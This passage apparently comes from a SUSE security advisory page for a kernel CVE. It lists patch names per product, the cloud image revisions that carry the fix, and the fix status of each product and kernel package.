| Patchnames: SUSE-SLE-Module-Basesystem-15-SP7-2026-1081 SUSE-SLE-Module-Basesystem-15-SP7-2026-447 SUSE-SLE-Module-Development-Tools-15-SP7-2026-1081 SUSE-SLE-Module-Development-Tools-15-SP7-2026-447 SUSE-SLE-Module-Legacy-15-SP7-2026-1081 SUSE-SLE-Module-Legacy-15-SP7-2026-447 SUSE-SLE-Module-Public-Cloud-15-SP7-2026-1081 SUSE-SLE-Module-Public-Cloud-15-SP7-2026-472 SUSE-SLE-Product-WE-15-SP7-2026-1081 SUSE-SLE-Product-WE-15-SP7-2026-447 |
| SUSE Linux Enterprise Server 16.0 |
| Patchnames: SUSE-SLES-16.0-325 SUSE-SLES-16.0-690 SUSE-SLES-16.0-691 SUSE-SLES-16.0-692 SUSE-SLES-16.0-705 SUSE-SLES-16.0-706 |
| SUSE Linux Enterprise Server for SAP Applications 15 SP4 |
| Patchnames: SUSE-SLE-Product-SLES_SAP-15-SP4-2026-984 |
| SUSE Linux Enterprise Server for SAP Applications 15 SP5 |
| Patchnames: SUSE-SLE-Product-SLES_SAP-15-SP5-2026-1003 |
| SUSE Linux Enterprise Server for SAP Applications 15 SP6 |
| Patchnames: SUSE-SLE-Product-SLES_SAP-15-SP6-2026-1041 |
| SUSE Linux Enterprise Server for SAP applications 16.0 |
| Patchnames: SUSE-SLES-16.0-325 SUSE-SLES-16.0-690 SUSE-SLES-16.0-691 SUSE-SLES-16.0-692 SUSE-SLES-16.0-705 SUSE-SLES-16.0-706 |
| SUSE Linux Enterprise Workstation Extension 15 SP7 |
| Patchnames: SUSE-SLE-Product-WE-15-SP7-2026-1081 SUSE-SLE-Product-WE-15-SP7-2026-447 |
| SUSE Linux Micro 6.0 |
| Patchnames: SUSE-SLE-Micro-6.0-kernel-281 SUSE-SLE-Micro-6.0-kernel-295 SUSE-SLE-Micro-6.0-kernel-340 SUSE-SLE-Micro-6.0-kernel-374 SUSE-SLE-Micro-6.0-kernel-375 SUSE-SLE-Micro-6.0-kernel-376 SUSE-SLE-Micro-6.0-kernel-377 SUSE-SLE-Micro-6.0-kernel-378 SUSE-SLE-Micro-6.0-kernel-379 SUSE-SLE-Micro-6.0-kernel-380 SUSE-SLE-Micro-6.0-kernel-381 SUSE-SLE-Micro-6.0-kernel-382 SUSE-SLE-Micro-6.0-kernel-383 SUSE-SLE-Micro-6.0-kernel-385 SUSE-SLE-Micro-6.0-kernel-386 SUSE-SLE-Micro-6.0-kernel-387 SUSE-SLE-Micro-6.0-kernel-388 SUSE-SLE-Micro-6.0-kernel-389 SUSE-SLE-Micro-6.0-kernel-390 SUSE-SLE-Micro-6.0-kernel-391 SUSE-SLE-Micro-6.0-kernel-394 SUSE-SLE-Micro-6.0-kernel-396 |
| SUSE Linux Micro 6.1 |
| Patchnames: SUSE-SLE-Micro-6.1-kernel-281 SUSE-SLE-Micro-6.1-kernel-295 SUSE-SLE-Micro-6.1-kernel-340 SUSE-SLE-Micro-6.1-kernel-374 SUSE-SLE-Micro-6.1-kernel-375 SUSE-SLE-Micro-6.1-kernel-376 SUSE-SLE-Micro-6.1-kernel-377 SUSE-SLE-Micro-6.1-kernel-378 SUSE-SLE-Micro-6.1-kernel-379 SUSE-SLE-Micro-6.1-kernel-380 SUSE-SLE-Micro-6.1-kernel-381 SUSE-SLE-Micro-6.1-kernel-382 SUSE-SLE-Micro-6.1-kernel-383 SUSE-SLE-Micro-6.1-kernel-385 SUSE-SLE-Micro-6.1-kernel-386 SUSE-SLE-Micro-6.1-kernel-387 SUSE-SLE-Micro-6.1-kernel-388 SUSE-SLE-Micro-6.1-kernel-389 SUSE-SLE-Micro-6.1-kernel-390 SUSE-SLE-Micro-6.1-kernel-391 SUSE-SLE-Micro-6.1-kernel-394 SUSE-SLE-Micro-6.1-kernel-396 |
| SUSE Linux Micro 6.2 |
| Patchnames: SUSE-SL-Micro-6.2-325 SUSE-SL-Micro-6.2-690 SUSE-SL-Micro-6.2-691 SUSE-SL-Micro-6.2-692 SUSE-SL-Micro-6.2-695 SUSE-SL-Micro-6.2-696 SUSE-SL-Micro-6.2-697 SUSE-SL-Micro-6.2-698 SUSE-SL-Micro-6.2-700 SUSE-SL-Micro-6.2-705 SUSE-SL-Micro-6.2-706 |
| SUSE Manager Proxy LTS 4.3 |
| Patchnames: SUSE-SLE-Product-SUSE-Manager-Proxy-4.3-LTS-2026-984 |
| SUSE Manager Retail Branch Server LTS 4.3 |
| Patchnames: SUSE-SLE-Product-SUSE-Manager-Retail-Branch-Server-4.3-LTS-2026-984 |
| SUSE Manager Server LTS 4.3 |
| Patchnames: SUSE-SLE-Product-SUSE-Manager-Server-4.3-LTS-2026-984 |
| openSUSE Leap 15.6 |
| Patchnames: openSUSE-SLE-15.6-2026-1041 |
| openSUSE Leap 16.0 |
| Patchnames: openSUSE-Leap-16.0-325 |
List of packages in QA
| Product(s) | Package(s) |
|---|---|
| SUSE Linux Enterprise Server 16.0 |
|
First public cloud image revisions this CVE is fixed in:
- alibaba/sles-15-sp4-chost-byos-v20260507
- alibaba/sles-15-sp5-chost-byos-v20260507
- alibaba/sles-15-sp7-chost-byos-v20260224
- alibaba/sles-15-sp7-chost-byos-v20260428
- amazon/suse-multi-linux-manager-proxy-5-1-byos-v20260304-arm64
- amazon/suse-multi-linux-manager-proxy-5-1-byos-v20260304-x86_64
- amazon/suse-multi-linux-manager-proxy-5-1-byos-v20260402-x86_64
- amazon/suse-multi-linux-manager-server-5-1-byos-v20260304-arm64
- amazon/suse-multi-linux-manager-server-5-1-byos-v20260304-x86_64
- amazon/suse-multi-linux-manager-server-5-1-byos-v20260402-arm64
- amazon/suse-multi-linux-manager-server-5-1-byos-v20260402-x86_64
- amazon/suse-sle-hpc-15-sp4-byos-v20260508-hvm-ssd-x86_64
- amazon/suse-sle-hpc-15-sp5-byos-v20260506-hvm-ssd-x86_64
- amazon/suse-sle-hpc-15-sp7-byos-v20260224-hvm-ssd-x86_64
- amazon/suse-sle-micro-5-5-v20260427-hvm-ssd-arm64-llc
- amazon/suse-sle-micro-5-5-v20260427-hvm-ssd-x86_64-llc
- amazon/suse-sle-micro-6-0-byos-v20260505-hvm-ssd-arm64
- amazon/suse-sle-micro-6-0-byos-v20260505-hvm-ssd-x86_64
- amazon/suse-sle-micro-6-0-v20260304-hvm-ssd-arm64-llc
- amazon/suse-sle-micro-6-0-v20260304-hvm-ssd-arm64-ltd
- amazon/suse-sle-micro-6-0-v20260304-hvm-ssd-x86_64-llc
- amazon/suse-sle-micro-6-0-v20260304-hvm-ssd-x86_64-ltd
- amazon/suse-sle-micro-6-0-v20260505-hvm-ssd-x86_64-llc
- amazon/suse-sle-micro-6-0-v20260506-hvm-ssd-x86_64-ltd
- amazon/suse-sle-micro-6-1-byos-v20260505-hvm-ssd-arm64
- amazon/suse-sle-micro-6-1-byos-v20260505-hvm-ssd-x86_64
- amazon/suse-sle-micro-6-1-v20260306-hvm-ssd-arm64-llc
- amazon/suse-sle-micro-6-1-v20260306-hvm-ssd-arm64-ltd
- amazon/suse-sle-micro-6-1-v20260306-hvm-ssd-x86_64-llc
- amazon/suse-sle-micro-6-1-v20260306-hvm-ssd-x86_64-ltd
- amazon/suse-sle-micro-6-1-v20260402-hvm-ssd-arm64-llc
- amazon/suse-sles-15-sp4-byos-v20260506-hvm-ssd-arm64
- amazon/suse-sles-15-sp4-byos-v20260506-hvm-ssd-x86_64
- amazon/suse-sles-15-sp4-chost-byos-v20260507-hvm-ssd-arm64
- amazon/suse-sles-15-sp4-chost-byos-v20260507-hvm-ssd-x86_64
- amazon/suse-sles-15-sp4-hardened-byos-v20260507-hvm-ssd-x86_64
- amazon/suse-sles-15-sp4-sapcal-v20260425-hvm-ssd-x86_64
- amazon/suse-sles-15-sp5-byos-v20260506-hvm-ssd-arm64
- amazon/suse-sles-15-sp5-byos-v20260506-hvm-ssd-x86_64
- amazon/suse-sles-15-sp5-chost-byos-v20260507-hvm-ssd-arm64
- amazon/suse-sles-15-sp5-chost-byos-v20260507-hvm-ssd-x86_64
- amazon/suse-sles-15-sp5-hardened-byos-v20260506-hvm-ssd-x86_64
- amazon/suse-sles-15-sp5-sapcal-v20260425-hvm-ssd-x86_64
- amazon/suse-sles-15-sp5-v20260425-ecs-hvm-ssd-x86_64
- amazon/suse-sles-15-sp5-v20260425-hvm-ssd-arm64
- amazon/suse-sles-15-sp5-v20260425-hvm-ssd-x86_64
- amazon/suse-sles-15-sp6-byos-v20260505-hvm-ssd-arm64
- amazon/suse-sles-15-sp6-byos-v20260505-hvm-ssd-x86_64
- amazon/suse-sles-15-sp6-hardened-byos-v20260505-hvm-ssd-x86_64
- amazon/suse-sles-15-sp6-sapcal-v20260424-hvm-ssd-x86_64
- amazon/suse-sles-15-sp6-v20260424-ecs-hvm-ssd-x86_64
- amazon/suse-sles-15-sp6-v20260424-hvm-ssd-x86_64
- amazon/suse-sles-15-sp6-v20260504-hvm-ssd-arm64
- amazon/suse-sles-15-sp7-byos-v20260220-hvm-ssd-x86_64
- amazon/suse-sles-15-sp7-byos-v20260224-hvm-ssd-arm64
- amazon/suse-sles-15-sp7-byos-v20260504-hvm-ssd-arm64
- amazon/suse-sles-15-sp7-byos-v20260504-hvm-ssd-x86_64
- amazon/suse-sles-15-sp7-chost-byos-v20260224-hvm-ssd-arm64
- amazon/suse-sles-15-sp7-chost-byos-v20260224-hvm-ssd-x86_64
- amazon/suse-sles-15-sp7-chost-byos-v20260424-hvm-ssd-arm64
- amazon/suse-sles-15-sp7-chost-byos-v20260424-hvm-ssd-x86_64
- amazon/suse-sles-15-sp7-hardened-byos-v20260220-hvm-ssd-x86_64
- amazon/suse-sles-15-sp7-hardened-byos-v20260504-hvm-ssd-x86_64
- amazon/suse-sles-15-sp7-sapcal-v20260424-hvm-ssd-x86_64
- amazon/suse-sles-15-sp7-v20260424-ecs-hvm-ssd-x86_64
- amazon/suse-sles-15-sp7-v20260424-hvm-ssd-x86_64
- amazon/suse-sles-15-sp7-v20260504-hvm-ssd-arm64
- amazon/suse-sles-sap-15-sp4-byos-v20260506-hvm-ssd-x86_64
- amazon/suse-sles-sap-15-sp4-hardened-byos-v20260507-hvm-ssd-x86_64
- amazon/suse-sles-sap-15-sp5-byos-v20260506-hvm-ssd-x86_64
- amazon/suse-sles-sap-15-sp5-hardened-byos-v20260507-hvm-ssd-x86_64
- amazon/suse-sles-sap-15-sp6-byos-v20260506-hvm-ssd-x86_64
- amazon/suse-sles-sap-15-sp6-hardened-byos-v20260506-hvm-ssd-x86_64
- amazon/suse-sles-sap-15-sp7-byos-v20260505-hvm-ssd-x86_64
- amazon/suse-sles-sap-15-sp7-hardened-byos-v20260310-hvm-ssd-x86_64
- amazon/suse-sles-sap-15-sp7-hardened-byos-v20260505-hvm-ssd-x86_64
- google/sle-hpc-15-sp4-byos-v20260423-x86-64
- google/sle-hpc-15-sp5-byos-v20260423-x86-64
- google/sle-hpc-15-sp6-byos-v20260506-x86-64
- google/sle-hpc-15-sp7-byos-v20260506-x86-64
- google/sle-micro-6-0-byos-v20260506-arm64
- google/sle-micro-6-0-byos-v20260506-x86-64
- google/sle-micro-6-1-byos-v20260506-arm64
- google/sle-micro-6-1-byos-v20260506-x86-64
- google/sles-15-sp4-byos-v20260424-arm64
- google/sles-15-sp4-byos-v20260424-x86-64
- google/sles-15-sp4-chost-byos-v20260507-arm64
- google/sles-15-sp4-chost-byos-v20260507-x86-64
- google/sles-15-sp4-hardened-byos-v20260424-x86-64
- google/sles-15-sp4-sapcal-v20260424-x86-64
- google/sles-15-sp5-byos-v20260424-arm64
- google/sles-15-sp5-byos-v20260424-x86-64
- google/sles-15-sp5-chost-byos-v20260507-arm64
- google/sles-15-sp5-chost-byos-v20260507-x86-64
- google/sles-15-sp5-hardened-byos-v20260424-x86-64
- google/sles-15-sp5-sapcal-v20260424-x86-64
- google/sles-15-sp5-v20260424-arm64
- google/sles-15-sp5-v20260424-x86-64
- google/sles-15-sp6-byos-v20260506-arm64
- google/sles-15-sp6-byos-v20260506-x86-64
- google/sles-15-sp6-hardened-byos-v20260506-x86-64
- google/sles-15-sp6-sapcal-v20260506-x86-64
- google/sles-15-sp6-v20260506-arm64
- google/sles-15-sp6-v20260506-x86-64
- google/sles-15-sp7-byos-v20260504-arm64
- google/sles-15-sp7-byos-v20260504-x86-64
- google/sles-15-sp7-chost-byos-v20260224-arm64
- google/sles-15-sp7-chost-byos-v20260224-x86-64
- google/sles-15-sp7-chost-byos-v20260421-arm64
- google/sles-15-sp7-chost-byos-v20260421-x86-64
- google/sles-15-sp7-hardened-byos-v20260504-x86-64
- google/sles-15-sp7-sapcal-v20260504-x86-64
- google/sles-15-sp7-v20260504-arm64
- google/sles-15-sp7-v20260504-x86-64
- google/sles-sap-15-sp4-byos-v20260424-x86-64
- google/sles-sap-15-sp4-hardened-byos-v20260424-x86-64
- google/sles-sap-15-sp4-hardened-v20260424-x86-64
- google/sles-sap-15-sp4-v20260424-x86-64
- google/sles-sap-15-sp5-byos-v20260424-x86-64
- google/sles-sap-15-sp5-hardened-byos-v20260424-x86-64
- google/sles-sap-15-sp5-hardened-v20260424-x86-64
- google/sles-sap-15-sp5-v20260424-x86-64
- google/sles-sap-15-sp6-byos-v20260506-x86-64
- google/sles-sap-15-sp6-hardened-byos-v20260506-x86-64
- google/sles-sap-15-sp6-hardened-v20260506-x86-64
- google/sles-sap-15-sp6-v20260506-x86-64
- google/sles-sap-15-sp7-byos-v20260505-x86-64
- google/sles-sap-15-sp7-hardened-byos-v20260505-x86-64
- google/sles-sap-15-sp7-hardened-v20260505-x86-64
- google/sles-sap-15-sp7-v20260505-x86-64
- google/suse-multi-linux-mgr-proxy-5-1-byos-v20260507-arm64
- google/suse-multi-linux-mgr-proxy-5-1-byos-v20260507-x86-64
- google/suse-multi-linux-mgr-server-5-1-byos-v20260507-x86-64
- google/suse-multi-linux-mgr-server-5-1-byos-v20260508-arm64
- microsoft/suse-multi-linux-manager-proxy-5-1-byos-v20260507-arm64
- microsoft/suse-multi-linux-manager-proxy-5-1-byos-v20260507-x86_64
- microsoft/suse-multi-linux-manager-server-5-1-byos-v20260507-x86_64
- microsoft/suse-multi-linux-manager-server-5-1-v20260325-arm64-ltd
- microsoft/suse-multi-linux-manager-server-5-1-v20260325-x86_64-ltd
- microsoft/suse-multi-linux-manager-server-5-1-v20260507-x86_64-llc
- microsoft/suse-multi-linux-manager-server-5-1-v20260508-arm64-llc
- microsoft/suse-sle-hpc-15-sp4-byos-v20260423-x86_64
- microsoft/suse-sle-hpc-15-sp5-byos-v20260423-x86_64
- microsoft/suse-sle-hpc-15-sp6-byos-v20260505-x86_64
- microsoft/suse-sle-micro-5-3-byos-v20260126-arm64
- microsoft/suse-sle-micro-5-3-byos-v20260427-x86_64
- microsoft/suse-sle-micro-5-4-byos-v20260427-arm64
- microsoft/suse-sle-micro-5-4-byos-v20260427-x86_64
- microsoft/suse-sle-micro-5-5-byos-v20260427-arm64
- microsoft/suse-sle-micro-5-5-byos-v20260427-x86_64
- microsoft/suse-sle-micro-5-5-v20260409-arm64-ltd
- microsoft/suse-sle-micro-5-5-v20260409-x86_64-ltd
- microsoft/suse-sle-micro-6-0-byos-v20260505-arm64
- microsoft/suse-sle-micro-6-0-byos-v20260505-x86_64
- microsoft/suse-sle-micro-6-0-v20260505-arm64-llc
- microsoft/suse-sle-micro-6-0-v20260505-x86_64-llc
- microsoft/suse-sle-micro-6-0-v20260506-arm64-ltd
- microsoft/suse-sle-micro-6-0-v20260506-x86_64-ltd
- microsoft/suse-sle-micro-6-1-byos-v20260505-arm64
- microsoft/suse-sle-micro-6-1-byos-v20260505-x86_64
- microsoft/suse-sle-micro-6-1-v20260505-arm64-ltd
- microsoft/suse-sle-micro-6-1-v20260505-x86_64-ltd
- microsoft/suse-sle-micro-6-1-v20260506-arm64-llc
- microsoft/suse-sle-micro-6-1-v20260506-x86_64-llc
- microsoft/suse-sles-15-sp4-byos-v20260425-arm64
- microsoft/suse-sles-15-sp4-byos-v20260425-x86_64
- microsoft/suse-sles-15-sp4-chost-byos-v20260507-arm64
- microsoft/suse-sles-15-sp4-chost-byos-v20260507-x86_64
- microsoft/suse-sles-15-sp4-hardened-byos-v20260425-x86_64
- microsoft/suse-sles-15-sp4-sapcal-v20260423-x86_64
- microsoft/suse-sles-15-sp5-byos-v20260425-arm64
- microsoft/suse-sles-15-sp5-byos-v20260425-x86_64
- microsoft/suse-sles-15-sp5-chost-byos-v20260507-arm64
- microsoft/suse-sles-15-sp5-chost-byos-v20260507-x86_64
- microsoft/suse-sles-15-sp5-hardened-byos-v20260425-x86_64
- microsoft/suse-sles-15-sp5-sapcal-v20260423-x86_64
- microsoft/suse-sles-15-sp5-v20260423-arm64
- microsoft/suse-sles-15-sp5-v20260425-arm64-llc
- microsoft/suse-sles-15-sp5-v20260425-arm64-ltd
- microsoft/suse-sles-15-sp6-byos-v20260505-arm64
- microsoft/suse-sles-15-sp6-byos-v20260505-x86_64
- microsoft/suse-sles-15-sp6-hardened-byos-v20260505-x86_64
- microsoft/suse-sles-15-sp6-sapcal-v20260505-x86_64
- microsoft/suse-sles-15-sp6-v20260505-arm64
- microsoft/suse-sles-15-sp6-v20260505-arm64-llc
- microsoft/suse-sles-15-sp6-v20260505-arm64-ltd
- microsoft/suse-sles-15-sp7-basic-v20260504-x86_64
- microsoft/suse-sles-15-sp7-byos-v20260504-arm64
- microsoft/suse-sles-15-sp7-byos-v20260504-x86_64
- microsoft/suse-sles-15-sp7-chost-byos-v20260224-arm64
- microsoft/suse-sles-15-sp7-chost-byos-v20260224-x86_64
- microsoft/suse-sles-15-sp7-chost-byos-v20260421-arm64
- microsoft/suse-sles-15-sp7-chost-byos-v20260421-x86_64
- microsoft/suse-sles-15-sp7-hardened-byos-v20260504-x86_64
- microsoft/suse-sles-15-sp7-sapcal-v20260504-x86_64
- microsoft/suse-sles-15-sp7-v20260504-arm64
- microsoft/suse-sles-15-sp7-v20260504-arm64-llc
- microsoft/suse-sles-15-sp7-v20260504-arm64-ltd
- microsoft/suse-sles-15-sp7-v20260504-x86_64
- microsoft/suse-sles-15-sp7-v20260504-x86_64-llc
- microsoft/suse-sles-15-sp7-v20260504-x86_64-ltd
- microsoft/suse-sles-sap-15-sp4-byos-v20260425-x86_64
- microsoft/suse-sles-sap-15-sp4-hardened-byos-v20260425-x86_64
- microsoft/suse-sles-sap-15-sp4-hardened-v20260423-x86_64
- microsoft/suse-sles-sap-15-sp4-v20260423-x86_64
- microsoft/suse-sles-sap-15-sp5-byos-v20260425-x86_64
- microsoft/suse-sles-sap-15-sp5-hardened-byos-v20260425-x86_64
- microsoft/suse-sles-sap-15-sp5-hardened-v20260425-x86_64
- microsoft/suse-sles-sap-15-sp5-v20260425-x86_64
- microsoft/suse-sles-sap-15-sp5-v20260425-x86_64-llc
- microsoft/suse-sles-sap-15-sp5-v20260425-x86_64-ltd
- microsoft/suse-sles-sap-15-sp6-byos-v20260506-x86_64
- microsoft/suse-sles-sap-15-sp6-hardened-byos-v20260506-x86_64
- microsoft/suse-sles-sap-15-sp6-hardened-v20260506-x86_64
- microsoft/suse-sles-sap-15-sp6-v20260505-x86_64-ltd
- microsoft/suse-sles-sap-15-sp6-v20260506-x86_64
- microsoft/suse-sles-sap-15-sp6-v20260506-x86_64-llc
- microsoft/suse-sles-sap-15-sp6-v20260506-x86_64-ltd
- microsoft/suse-sles-sap-15-sp7-byos-v20260505-x86_64
- microsoft/suse-sles-sap-15-sp7-hardened-byos-v20260505-x86_64
- microsoft/suse-sles-sap-15-sp7-hardened-v20260505-x86_64
- microsoft/suse-sles-sap-15-sp7-v20260505-x86_64
- microsoft/suse-sles-sap-15-sp7-v20260505-x86_64-llc
- microsoft/suse-sles-sap-15-sp7-v20260505-x86_64-ltd
Status of this issue by product and package
Please note that this evaluation state might be work in progress, incomplete or outdated. Also information for service packs in the LTSS phase is only included for issues meeting the LTSS criteria. If in doubt, feel free to contact us for clarification. The updates are grouped by state of their lifecycle. SUSE product lifecycles are documented on the lifecycle page.
| Product(s) | Source package | State |
|---|---|---|
| Products under general support and receiving all security fixes. | ||
| SUSE Linux Enterprise Desktop 15 SP7 | kernel-64kb | Released |
| SUSE Linux Enterprise Desktop 15 SP7 | kernel-default | Released |
| SUSE Linux Enterprise Desktop 15 SP7 | kernel-default-base | Released |
| SUSE Linux Enterprise Desktop 15 SP7 | kernel-docs | Released |
| SUSE Linux Enterprise Desktop 15 SP7 | kernel-obs-build | Released |
| SUSE Linux Enterprise Desktop 15 SP7 | kernel-source | Released |
| SUSE Linux Enterprise Desktop 15 SP7 | kernel-syms | Released |
| SUSE Linux Enterprise Desktop 15 SP7 | kernel-zfcpdump | Released |
| SUSE Linux Enterprise High Availability Extension 15 SP7 | kernel-default | Released |
| SUSE Linux Enterprise High Availability Extension 15 SP7 | kernel-source | Released |
| SUSE Linux Enterprise High Availability Extension 16.0 | kernel-default | Released |
| SUSE Linux Enterprise High Availability Extension 16.0 | kernel-source | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | kernel-64kb | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | kernel-azure | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | kernel-default | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | kernel-default-base | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | kernel-docs | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | kernel-obs-build | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | kernel-source | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | kernel-source-azure | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | kernel-syms | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | kernel-syms-azure | Released |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | kernel-zfcpdump | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-default | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7-RT_Update_0 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7-RT_Update_1 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7-RT_Update_2 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7-RT_Update_3 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7-RT_Update_4 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7-RT_Update_5 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7-RT_Update_6 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7-RT_Update_7 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7-RT_Update_8 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7-RT_Update_9 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7_Update_0 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7_Update_1 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7_Update_2 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7_Update_3 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7_Update_4 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7_Update_5 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7_Update_6 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7_Update_7 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-livepatch-SLE15-SP7_Update_8 | Released |
| SUSE Linux Enterprise Live Patching 15 SP7 | kernel-source | Released |
| SUSE Linux Enterprise Micro 5.3 | kernel-default | Released |
| SUSE Linux Enterprise Micro 5.3 | kernel-default-base | Released |
| SUSE Linux Enterprise Micro 5.3 | kernel-rt | Released |
| SUSE Linux Enterprise Micro 5.3 | kernel-source | Released |
| SUSE Linux Enterprise Micro 5.3 | kernel-source-rt | Released |
| SUSE Linux Enterprise Micro 5.4 | kernel-default | Released |
| SUSE Linux Enterprise Micro 5.4 | kernel-default-base | Released |
| SUSE Linux Enterprise Micro 5.4 | kernel-rt | Released |
| SUSE Linux Enterprise Micro 5.4 | kernel-source | Released |
| SUSE Linux Enterprise Micro 5.4 | kernel-source-rt | Released |
| SUSE Linux Enterprise Micro 5.5 | kernel-default | Released |
| SUSE Linux Enterprise Micro 5.5 | kernel-default-base | Released |
| SUSE Linux Enterprise Micro 5.5 | kernel-rt | Released |
| SUSE Linux Enterprise Micro 5.5 | kernel-source | Released |
| SUSE Linux Enterprise Micro 5.5 | kernel-source-rt | Released |
| SUSE Linux Enterprise Micro for Rancher 5.2 | kernel-default | Released |
| SUSE Linux Enterprise Micro for Rancher 5.2 | kernel-source | Released |
| SUSE Linux Enterprise Micro for Rancher 5.2 | kernel-source-rt | Released |
| SUSE Linux Enterprise Micro for Rancher 5.3 | kernel-default | Released |
| SUSE Linux Enterprise Micro for Rancher 5.3 | kernel-source | Released |
| SUSE Linux Enterprise Micro for Rancher 5.3 | kernel-source-rt | Released |
| SUSE Linux Enterprise Micro for Rancher 5.4 | kernel-default | Released |
| SUSE Linux Enterprise Micro for Rancher 5.4 | kernel-source | Released |
| SUSE Linux Enterprise Micro for Rancher 5.4 | kernel-source-rt | Released |
| SUSE Linux Enterprise Module for Basesystem 15 SP7 | kernel-64kb | Released |
| SUSE Linux Enterprise Module for Basesystem 15 SP7 | kernel-default | Released |
| SUSE Linux Enterprise Module for Basesystem 15 SP7 | kernel-default-base | Released |
| SUSE Linux Enterprise Module for Basesystem 15 SP7 | kernel-source | Released |
| SUSE Linux Enterprise Module for Basesystem 15 SP7 | kernel-zfcpdump | Released |
| SUSE Linux Enterprise Module for Development Tools 15 SP7 | kernel-default | Released |
| SUSE Linux Enterprise Module for Development Tools 15 SP7 | kernel-docs | Released |
| SUSE Linux Enterprise Module for Development Tools 15 SP7 | kernel-obs-build | Released |
| SUSE Linux Enterprise Module for Development Tools 15 SP7 | kernel-source | Released |
| SUSE Linux Enterprise Module for Development Tools 15 SP7 | kernel-syms | Released |
| SUSE Linux Enterprise Module for Legacy 15 SP7 | kernel-default | Released |
| SUSE Linux Enterprise Module for Legacy 15 SP7 | kernel-source | Released |
| SUSE Linux Enterprise Module for Public Cloud 15 SP7 | kernel-azure | Released |
| SUSE Linux Enterprise Module for Public Cloud 15 SP7 | kernel-default | Released |
| SUSE Linux Enterprise Module for Public Cloud 15 SP7 | kernel-source | Released |
| SUSE Linux Enterprise Module for Public Cloud 15 SP7 | kernel-source-azure | Released |
| SUSE Linux Enterprise Module for Public Cloud 15 SP7 | kernel-syms-azure | Released |
| SUSE Linux Enterprise Real Time 15 SP7 | kernel-rt | Released |
| SUSE Linux Enterprise Real Time 15 SP7 | kernel-source-rt | Released |
| SUSE Linux Enterprise Real Time 15 SP7 | kernel-syms-rt | Released |
| SUSE Linux Enterprise Server 15 SP7 | kernel-64kb | Released |
| SUSE Linux Enterprise Server 15 SP7 | kernel-azure | Released |
| SUSE Linux Enterprise Server 15 SP7 | kernel-default | Released |
| SUSE Linux Enterprise Server 15 SP7 | kernel-default-base | Released |
| SUSE Linux Enterprise Server 15 SP7 | kernel-docs | Released |
| SUSE Linux Enterprise Server 15 SP7 | kernel-obs-build | Released |
| SUSE Linux Enterprise Server 15 SP7 | kernel-source | Released |
| SUSE Linux Enterprise Server 15 SP7 | kernel-source-azure | Released |
| SUSE Linux Enterprise Server 15 SP7 | kernel-syms | Released |
| SUSE Linux Enterprise Server 15 SP7 | kernel-syms-azure | Released |
| SUSE Linux Enterprise Server 15 SP7 | kernel-zfcpdump | Released |
| SUSE Linux Enterprise Server 16.0 | kernel-64kb | In progress |
| SUSE Linux Enterprise Server 16.0 | kernel-azure | In progress |
| SUSE Linux Enterprise Server 16.0 | kernel-default | In progress |
| SUSE Linux Enterprise Server 16.0 | kernel-default-base | In progress |
| SUSE Linux Enterprise Server 16.0 | kernel-docs | In progress |
| SUSE Linux Enterprise Server 16.0 | kernel-kvmsmall | In progress |
| SUSE Linux Enterprise Server 16.0 | kernel-livepatch-SLE16_Update_0 | In progress |
| SUSE Linux Enterprise Server 16.0 | kernel-livepatch-SLE16_Update_1 | In progress |
| SUSE Linux Enterprise Server 16.0 | kernel-livepatch-SLE16_Update_2 | In progress |
| SUSE Linux Enterprise Server 16.0 | kernel-livepatch-SLE16_Update_3 | In progress |
| SUSE Linux Enterprise Server 16.0 | kernel-livepatch-SLE16_Update_4 | In progress |
| SUSE Linux Enterprise Server 16.0 | kernel-obs-qa | In progress |
| SUSE Linux Enterprise Server 16.0 | kernel-source | In progress |
| SUSE Linux Enterprise Server 16.0 | kernel-source-azure | Affected |
| SUSE Linux Enterprise Server 16.0 | kernel-syms | In progress |
| SUSE Linux Enterprise Server 16.0 | kernel-zfcpdump | In progress |
| SUSE Linux Enterprise Server 16.1 | kernel-source | Affected |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | kernel-64kb | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | kernel-azure | Released |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | kernel-default | Released |
